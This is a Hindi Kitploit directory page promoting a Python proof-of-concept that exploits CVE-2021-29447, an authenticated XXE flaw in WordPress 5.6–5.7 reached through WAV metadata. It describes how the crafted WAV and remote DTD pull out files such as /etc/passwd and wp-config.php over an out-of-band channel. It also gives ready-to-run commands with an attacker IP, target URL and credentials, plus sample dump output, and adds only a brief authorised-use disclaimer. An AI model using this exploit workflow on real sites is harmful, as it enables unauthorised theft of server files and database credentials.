Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7 — WordPress 5.6-5.7 (PHP 8+) प्रमाणित XXE इंजेक्शन का शोषण करने हेतु POC | Kitploit
उपकरण/GitHubGitHub/tea-on/cve-2021-29447-authenticated-xxe-wordpress-5.6-5.7
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubtea-on/cve-2021-29447-authenticated-xxe-wordpress-5.6-5.7

CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7

WordPress 5.6-5.7 (PHP 8+) प्रमाणित XXE इंजेक्शन का शोषण करने हेतु POC

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

CVE-2021-29447 प्रमाणित XXE शोषण वर्डप्रेस के लिए 🎯

वर्डप्रेस संस्करण 5.6–5.7 में प्रमाणित XXE कमजोरी (CVE-2021-29447) का WAV मेटाडेटा के माध्यम से शोषण करने के लिए एक Python PoC। यह WAV फाइलों में iXML चंक का दुरुपयोग करके संवेदनशील डेटा—जैसे /etc/passwd, wp-config.php, और अधिक—को सीधे आपकी dump/ निर्देशिका में आउट-ऑफ-बैंड (OOB) बहिर्वहन को ट्रिगर करता है।


यह कैसे काम करता है 🔍

यह स्क्रिप्ट एक XML एक्सटर्नल एंटिटी (XXE) दोष का लाभ उठाती है कि वर्डप्रेस WAV मेटाडेटा को कैसे पार्स करता है:

  1. WAV निर्माण: एक दुर्भावनापूर्ण WAV फ़ाइल उत्पन्न करता है जिसमें एक iXML चंक एम्बेडेड होता है जो आपकी मशीन पर एक रिमोट DTD को संदर्भित करता है।
  2. DTD होस्टिंग: एक HTTP सर्वर (या आपके अपने का उपयोग करता है) को चालू करता है जो तैयार DTD को प्रस्तुत करता है, जो वर्डप्रेस को एक लक्ष्य फ़ाइल (जैसे, /etc/passwd) को पढ़ने और Base64-एन्कोड करने का निर्देश देता है।
  3. फ़ाइल अपलोड: वर्डप्रेस में प्रमाणित करता है, मीडिया-अपलोड नॉन्स प्राप्त करता है, और मीडिया लाइब्रेरी के माध्यम से WAV अपलोड करता है।
  4. OOB बहिर्वहन: वर्डप्रेस WAV को पार्स करता है, DTD को लाता है, फिर आपके सर्वर पर एक कॉलबैक करता है जिसमें Base64 डेटा होता है। स्क्रिप्ट इसे डिकोड करती है और dump/ में लिखती है।

मुख्य विशेषताएं ⚡

  • इंटरैक्टिव मोड (-i): CTRL+C तक फ़ाइल पथों के लिए संकेत देता है—आकस्मिक अन्वेषण के लिए बढ़िया।
  • वर्डलिस्ट मोड (-w <file>): सूची से दर्जनों फ़ाइल पथों को बैच प्रोसेस करता है।
  • HTTP सर्वर छोड़ें (--no-http): बिल्ट-इन के बजाय अपने स्वयं के वेबसर्वर का उपयोग करें।
  • डिबग मोड (--debug): विस्तृत HTTP और आंतरिक डिबग लॉग देखें।
  • स्वच्छ, रंगीन लॉग: त्वरित स्थिति जांच के लिए उपसर्गित लेबल—[CONFIG], [UPLOAD], [DUMP], [WARN], [ERROR]।
  • कॉन्फ़िगरेबल टाइमआउट: जारी रखने से पहले प्रत्येक बहिर्वहन के लिए 6 सेकंड तक प्रतीक्षा करें।

स्थापना 🛠️

  1. रिपॉजिटरी को क्लोन करें:
    root@kitploit:~
    git clone https://github.com/Tea-On/CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7.git
    cd CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7
    
  2. Python निर्भरता स्थापित करें:
    root@kitploit:~
    pip3 install requests
    

🧾 तर्क संदर्भ


उदाहरण उपयोग 💥

इंटरैक्टिव मोड

root@kitploit:~
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local -i
root@kitploit:~
[CONFIG] Interactive mode (CTRL+C to exit)
File> /etc/passwd
[CONFIG] DTD written: dtd/L2V0Yy9wYXNzd2Q=.dtd
[CONFIG] WAV built
[INFO] Nonce: d87f00a552
[DUMP] Dumped: dump/passwd
[UPLOAD] Upload ok (200)
[UPLOAD] URL: http://vulnerable.local/wp-content/uploads/payload.wav
File>

वर्डलिस्ट मोड

root@kitploit:~
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local -w wordlist.txt
root@kitploit:~
[CONFIG] Loaded 4 paths from "wordlist.txt"
[CONFIG] Using HTTP server at 10.10.14.8:8080
[CONFIG] Starting batch exfiltration...
[DUMP] [/etc/passwd] → dump/passwd
[WARN] No exfil for /etc/hostname within 6s, continuing
[UPLOAD] Upload ok (200)
[ERROR] Upload fail (502) on "/nonexistent"

नो-सर्वर और डिबग

root@kitploit:~
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local --no-http --debug -w wordlist.txt

अपने स्वयं के HTTP सर्वर का उपयोग करके dtd/ को होस्ट करें और कॉलबैक कैप्चर करें। डिबग लॉग [DEBUG] के रूप में दिखाई देते हैं।


आउटपुट निर्देशिकाएं 📂

  • dtd/ – लक्ष्य को प्रस्तुत की गई उत्पन्न DTD फ़ाइलें।
  • dump/ – डिकोड की गई फ़ाइल सामग्री, मूल पथ के नाम पर।

टिप्स और ट्रिक्स 💡

  • टाइमआउट समायोजित करें: धीमे नेटवर्क के लिए EXFIL_TIMEOUT वेरिएबल (डिफ़ॉल्ट 6s) बदलें।
  • डिबग का उपयोग करें: प्रमाणीकरण, अपलोड, या कॉलबैक के साथ समस्याओं का निदान करने के लिए --debug सक्षम करें।

जिम्मेदार खुलासा और लाइसेंस 🔐

इस उपकरण का उपयोग केवल उन प्रणालियों पर करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।

MIT License के तहत लाइसेंस प्राप्त। योगदान का स्वागत है—आइए हैकिंग को नैतिक और मजेदार बनाए रखें! ✨

टूल डाउनलोड करें
ArgumentRequiredDescription
-H, --host✅DTD प्रस्तुत करने और कॉलबैक प्राप्त करने के लिए स्थानीय होस्ट/IP
-p, --port✅HTTP सर्वर के लिए स्थानीय पोर्ट
-u, --user✅अपलोड अनुमतियों वाला वर्डप्रेस उपयोगकर्ता नाम
-P, --pass✅वर्डप्रेस पासवर्ड
-d, --domain✅लक्ष्य वर्डप्रेस URL (http:// शामिल करें)
-w, --wordlist❌प्राप्त करने के लिए न्यूलाइन-सेपरेटेड पथों वाली फ़ाइल
-i, --interactive❌इंटरैक्टिव रूप से फ़ाइल पथों के लिए संकेत दें
--no-http❌बिल्ट-इन HTTP सर्वर शुरू करना छोड़ें
--debug❌डिबग लॉग सक्षम करें (विस्तृत HTTP और आंतरिक विवरण)